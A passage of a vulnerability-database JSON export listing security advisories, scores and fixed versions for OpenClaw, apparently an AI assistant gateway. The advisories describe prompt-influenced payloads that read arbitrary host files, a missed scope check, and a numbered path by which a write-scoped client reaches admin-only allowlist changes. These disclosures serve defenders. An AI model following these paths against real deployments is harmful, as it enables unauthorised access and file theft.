                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41297"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-marketplace-plugin-download-redirect",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "7.6",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N"
                        },
                        {
                            "value": "4.8",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:N/VI:L/VA:N/SC:H/SI:L/SA:N"
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-21T13:41:27Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-marketplace-plugin-download-redirect"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-vjx8-8p7h-82gr",
                    "reference_id": "GHSA-vjx8-8p7h-82gr",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-vjx8-8p7h-82gr"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api",
                    "purl": "pkg:npm/openclaw@2026.3.31",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-258k-a4dw-tfae"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-356u-h788-pkgt"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-733f-57ds-xugm"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7ntr-5dr5-9uf8"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-7z2s-k6ty-ekg1"
                        },
                        {
                            "vulnerability": "VCID-96jd-x87b-s3ey"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bgwh-spue-yybk"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-d8v2-gft5-buee"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p7v5-jqhq-nbhz"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-q6ne-sw1r-xkd1"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-qjss-tvgk-3ubk"
                        },
                        {
                            "vulnerability": "VCID-r5bw-c2py-9udf"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-una1-gxkk-t3bp"
                        },
                        {
                            "vulnerability": "VCID-v9cd-65tf-p3f8"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-w58d-6veg-uugy"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xfgw-ua7r-abbr"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-y7sd-j9xn-qffs"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"
                }
            ],
            "aliases": [
                "CVE-2026-41297",
                "GHSA-vjx8-8p7h-82gr"
            ],
            "risk_score": 3.4,
            "exploitability": "0.5",
            "weighted_severity": "6.8",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p7me-4bzz-83cm"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89847?format=api",
            "vulnerability_id": "VCID-p7v5-jqhq-nbhz",
            "summary": "OpenClaw: QQ Bot structured payloads could read arbitrary local files\n## Summary\n\nBefore OpenClaw 2026.4.2, QQ Bot structured media payloads could read local files from attacker-chosen paths. A crafted structured payload could escape QQ Bot-owned media roots and cause arbitrary file reads on the host.\n\n## Impact\n\nPrompt-influenced structured payload output could exfiltrate any host file readable by the OpenClaw process through the QQ Bot media-send path. This was a real confidentiality bug on the host filesystem boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `2c45b06afdd6f7c621038b5419d8e661cff34a7f` — restrict QQ Bot structured payload local paths\n\n## Release Process Note\n\nThe fix is present on `main` and is staged for OpenClaw `2026.4.2`. Publish this advisory after the `2026.4.2` npm release is live.\n\nThanks @feiyang666 of Tencent zhuque Lab (https://github.com/Tencent/AI-Infra-Guard) for reporting.",
            "references": [
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/2c45b06afdd6f7c621038b5419d8e661cff34a7f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/2c45b06afdd6f7c621038b5419d8e661cff34a7f"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-846p-hgpv-vphc",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "6.9",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-846p-hgpv-vphc"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-846p-hgpv-vphc",
                    "reference_id": "GHSA-846p-hgpv-vphc",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-846p-hgpv-vphc"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109939?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.2",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1pbz-8rnx-dkhe"
                        },
                        {
                            "vulnerability": "VCID-29a1-7ar7-67e1"
                        },
                        {
                            "vulnerability": "VCID-2c8p-gbaw-3ye4"
                        },
                        {
                            "vulnerability": "VCID-2h6a-becf-x7ej"
                        },
                        {
                            "vulnerability": "VCID-2khh-wv8p-97ff"
                        },
                        {
                            "vulnerability": "VCID-2mxq-krq5-bycx"
                        },
                        {
                            "vulnerability": "VCID-3xmj-n798-x3cw"
                        },
                        {
                            "vulnerability": "VCID-3zwq-dz2u-pqgv"
                        },
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-4urc-4536-pqhk"
                        },
                        {
                            "vulnerability": "VCID-6wth-qthz-yud8"
                        },
                        {
                            "vulnerability": "VCID-6y5w-am4s-6qa5"
                        },
                        {
                            "vulnerability": "VCID-73cz-n29z-uqem"
                        },
                        {
                            "vulnerability": "VCID-75yr-sbce-nkah"
                        },
                        {
                            "vulnerability": "VCID-7akj-469t-57hz"
                        },
                        {
                            "vulnerability": "VCID-7snr-fn3u-x3b8"
                        },
                        {
                            "vulnerability": "VCID-9hcd-uj62-8yeu"
                        },
                        {
                            "vulnerability": "VCID-9kgh-wj9w-ykff"
                        },
                        {
                            "vulnerability": "VCID-9xgq-vtg2-jucq"
                        },
                        {
                            "vulnerability": "VCID-a46u-tnbh-fyhs"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-arks-g6hw-abbw"
                        },
                        {
                            "vulnerability": "VCID-bkya-73v8-bber"
                        },
                        {
                            "vulnerability": "VCID-c25h-khws-2fc3"
                        },
                        {
                            "vulnerability": "VCID-cbuu-4d6c-rben"
                        },
                        {
                            "vulnerability": "VCID-dfdk-dhwf-9yaj"
                        },
                        {
                            "vulnerability": "VCID-dmse-bb22-rkcj"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-e4ac-qm17-qbf5"
                        },
                        {
                            "vulnerability": "VCID-fuda-zxu8-gbb4"
                        },
                        {
                            "vulnerability": "VCID-gk95-28x9-17dk"
                        },
                        {
                            "vulnerability": "VCID-gkyv-ahk7-1ud3"
                        },
                        {
                            "vulnerability": "VCID-haxd-ps1x-h3ch"
                        },
                        {
                            "vulnerability": "VCID-hz33-9efv-c7ef"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-k8s8-zjv4-gqdb"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-kxmf-d7w1-xfcv"
                        },
                        {
                            "vulnerability": "VCID-ma62-gtan-97au"
                        },
                        {
                            "vulnerability": "VCID-mszk-dr24-xugw"
                        },
                        {
                            "vulnerability": "VCID-mv8b-cryt-u3g8"
                        },
                        {
                            "vulnerability": "VCID-mxu5-yjqs-nuap"
                        },
                        {
                            "vulnerability": "VCID-nkh4-j2pe-1qhr"
                        },
                        {
                            "vulnerability": "VCID-ns77-4wfj-9ka6"
                        },
                        {
                            "vulnerability": "VCID-ntwt-jkgr-sffu"
                        },
                        {
                            "vulnerability": "VCID-nv6g-7gs9-pfan"
                        },
                        {
                            "vulnerability": "VCID-nw4r-wjgs-8qc1"
                        },
                        {
                            "vulnerability": "VCID-p7gx-9usz-yyew"
                        },
                        {
                            "vulnerability": "VCID-p8xd-2um4-9ufr"
                        },
                        {
                            "vulnerability": "VCID-pae5-uyu7-k3c1"
                        },
                        {
                            "vulnerability": "VCID-pdmd-a4fg-8fcg"
                        },
                        {
                            "vulnerability": "VCID-pj41-sunw-vbcj"
                        },
                        {
                            "vulnerability": "VCID-psms-gauf-tkbz"
                        },
                        {
                            "vulnerability": "VCID-qedr-a3ay-v3gx"
                        },
                        {
                            "vulnerability": "VCID-rr6t-1193-ybgz"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-t2yy-9ume-t7be"
                        },
                        {
                            "vulnerability": "VCID-vfbb-bpy9-87ey"
                        },
                        {
                            "vulnerability": "VCID-vy8v-np82-r3b5"
                        },
                        {
                            "vulnerability": "VCID-vz7k-r7c4-ebfg"
                        },
                        {
                            "vulnerability": "VCID-w2tj-nqa6-cuam"
                        },
                        {
                            "vulnerability": "VCID-w4p1-sxdg-hyha"
                        },
                        {
                            "vulnerability": "VCID-wmr3-83u3-6qdb"
                        },
                        {
                            "vulnerability": "VCID-wyce-qxau-mqff"
                        },
                        {
                            "vulnerability": "VCID-x2ru-ydpv-f3ah"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-xnvm-rp36-vyaj"
                        },
                        {
                            "vulnerability": "VCID-xsct-xjs7-nbab"
                        },
                        {
                            "vulnerability": "VCID-y65g-4baa-a7c2"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-yhpq-5qy3-y7bn"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        },
                        {
                            "vulnerability": "VCID-z8mj-pnbe-wqej"
                        },
                        {
                            "vulnerability": "VCID-zg68-u5b5-vkft"
                        },
                        {
                            "vulnerability": "VCID-zpte-tgt5-wqcm"
                        },
                        {
                            "vulnerability": "VCID-zu4s-jnn3-1kd8"
                        },
                        {
                            "vulnerability": "VCID-zunq-wnnf-k3fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2"
                }
            ],
            "aliases": [
                "GHSA-846p-hgpv-vphc"
            ],
            "risk_score": 3.1,
            "exploitability": "0.5",
            "weighted_severity": "6.2",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p7v5-jqhq-nbhz"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89625?format=api",
            "vulnerability_id": "VCID-p8xd-2um4-9ufr",
            "summary": "OpenClaw: Assistant media route missed scope enforcement for trusted-proxy authorization\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.4.20`\n- Patched version: `2026.4.20`\n\n## Impact\n\nThe Control UI assistant-media route authenticated trusted-proxy callers but did not enforce the declared operator scopes for identity-bearing HTTP auth paths. A trusted-proxy caller without `operator.read` could access assistant-media files and metadata that were otherwise inside allowed media roots.\n\nThe route still required successful gateway authentication and media-root checks. Severity is low.\n\n## Fix\n\nAssistant-media file and metadata requests now require `operator.read` on identity-bearing HTTP auth paths.\n\nFix commit:\n\n- `99ef3a63c58440d53f8e45ad861b846032fcb036`\n\n## Release\n\nFixed in OpenClaw `2026.4.20`.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41908",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11147",
                            "published_at": "2026-06-07T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11181",
                            "published_at": "2026-06-06T12:55:00Z"
                        },
                        {
                            "value": "0.00036",
                            "scoring_system": "epss",
                            "scoring_elements": "0.11188",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41908"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/commit/99ef3a63c58440d53f8e45ad861b846032fcb036",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T18:25:38Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/commit/99ef3a63c58440d53f8e45ad861b846032fcb036"
                },
                {
                    "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v8qf-fr4g-28p2",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T18:25:38Z/"
                        }
                    ],
                    "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-v8qf-fr4g-28p2"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41908",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41908"
                },
                {
                    "reference_url": "https://www.vulncheck.com/advisories/openclaw-scope-enforcement-bypass-in-assistant-media-route",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.3",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-23T18:25:38Z/"
                        }
                    ],
                    "url": "https://www.vulncheck.com/advisories/openclaw-scope-enforcement-bypass-in-assistant-media-route"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-v8qf-fr4g-28p2",
                    "reference_id": "GHSA-v8qf-fr4g-28p2",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "LOW",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-v8qf-fr4g-28p2"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/109923?format=api",
                    "purl": "pkg:npm/openclaw@2026.4.20",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-4316-7q9a-xuhx"
                        },
                        {
                            "vulnerability": "VCID-4u3z-rs45-gbhe"
                        },
                        {
                            "vulnerability": "VCID-a4jz-y9s4-zkfg"
                        },
                        {
                            "vulnerability": "VCID-dv5s-pvw1-a7fu"
                        },
                        {
                            "vulnerability": "VCID-e25p-j5ed-yqfz"
                        },
                        {
                            "vulnerability": "VCID-jshg-1pb2-wbak"
                        },
                        {
                            "vulnerability": "VCID-kcy2-a98b-uyg7"
                        },
                        {
                            "vulnerability": "VCID-ry1r-br3q-2uaw"
                        },
                        {
                            "vulnerability": "VCID-t2ve-xemk-mqa9"
                        },
                        {
                            "vulnerability": "VCID-xj73-kszs-yygp"
                        },
                        {
                            "vulnerability": "VCID-ye4t-n6r3-67ab"
                        },
                        {
                            "vulnerability": "VCID-ymmv-2qmq-6kap"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.20"
                }
            ],
            "aliases": [
                "CVE-2026-41908",
                "GHSA-v8qf-fr4g-28p2"
            ],
            "risk_score": 1.9,
            "exploitability": "0.5",
            "weighted_severity": "3.9",
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p8xd-2um4-9ufr"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91065?format=api",
            "vulnerability_id": "VCID-pa1f-qzsh-efa9",
            "summary": "OpenClaw: Gateway operator.write Can Reach Admin-Class Channel Allowlist Persistence via chat.send\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n## Summary\n\nThe shared `/allowlist` command persists channel authorization config through `writeConfigFile(...)` but does not re-validate gateway client scopes for internal gateway callers. Because `chat.send` is intentionally reachable to `operator.write` callers and still creates a generic command-authorized internal context, an authenticated write-scoped gateway client can indirectly mutate channel `allowFrom` and `groupAllowFrom` policy that direct `config.patch` correctly reserves to `operator.admin`.\n\nThis is not just a generic code smell. The current code already shows the intended boundary by adding sink-side internal admin checks to shared `/config` and `/plugins` writes, but `/allowlist` was left behind.\n\n## Details\n\nThe gateway's documented scope split is clear:\n\n- `chat.send` is a write-scoped action.\n- direct config mutation is an admin-scoped action.\n\nThe vulnerable path is:\n\n1. A gateway client authenticates with `operator.write`.\n2. The client calls `chat.send`, which is intentionally allowed for that scope.\n3. `chat.send` builds an internal message context with `CommandAuthorized: true` and carries `GatewayClientScopes` into the reply pipeline.\n4. `resolveCommandAuthorization(...)` converts that internal message into `isAuthorizedSender=true` in the common case where no stricter `commands.allowFrom` override is configured.\n5. `/allowlist add|remove` accepts that generic command authorization and proceeds into its config-backed edit path.\n6. The handler clones the parsed config, calls `plugin.allowlist.applyConfigEdit(...)`, validates the result, and persists it with `writeConfigFile(validated.config)`.\n7. No sink-side check requires `operator.admin` before the persistent write occurs.\n\nThat creates a direct control-plane mismatch:\n\n- `config.patch` rejects the same caller with `missing scope: operator.admin`.\n- `/allowlist add dm ...` or `/allowlist add group ...` reached through `chat.send` can still rewrite channel authorization state.\n\n## Impact\n\n- A gateway client intentionally limited to `operator.write` can persist first-party channel authorization policy.\n- The caller can widen DM or group allowlists for channels using the shared `/allowlist` plumbing.\n- This weakens the repo's documented control-plane privilege split between ordinary write actions and admin-only persistent authorization mutation.\n\n## Remediation\n\n### 1) Add the Missing Sink-Side Internal Admin Check to `/allowlist`\n\nMirror the existing hardened pattern from `/config` and `/plugins`.\n\nBefore any config-backed `/allowlist add|remove` write, require:\n\n- 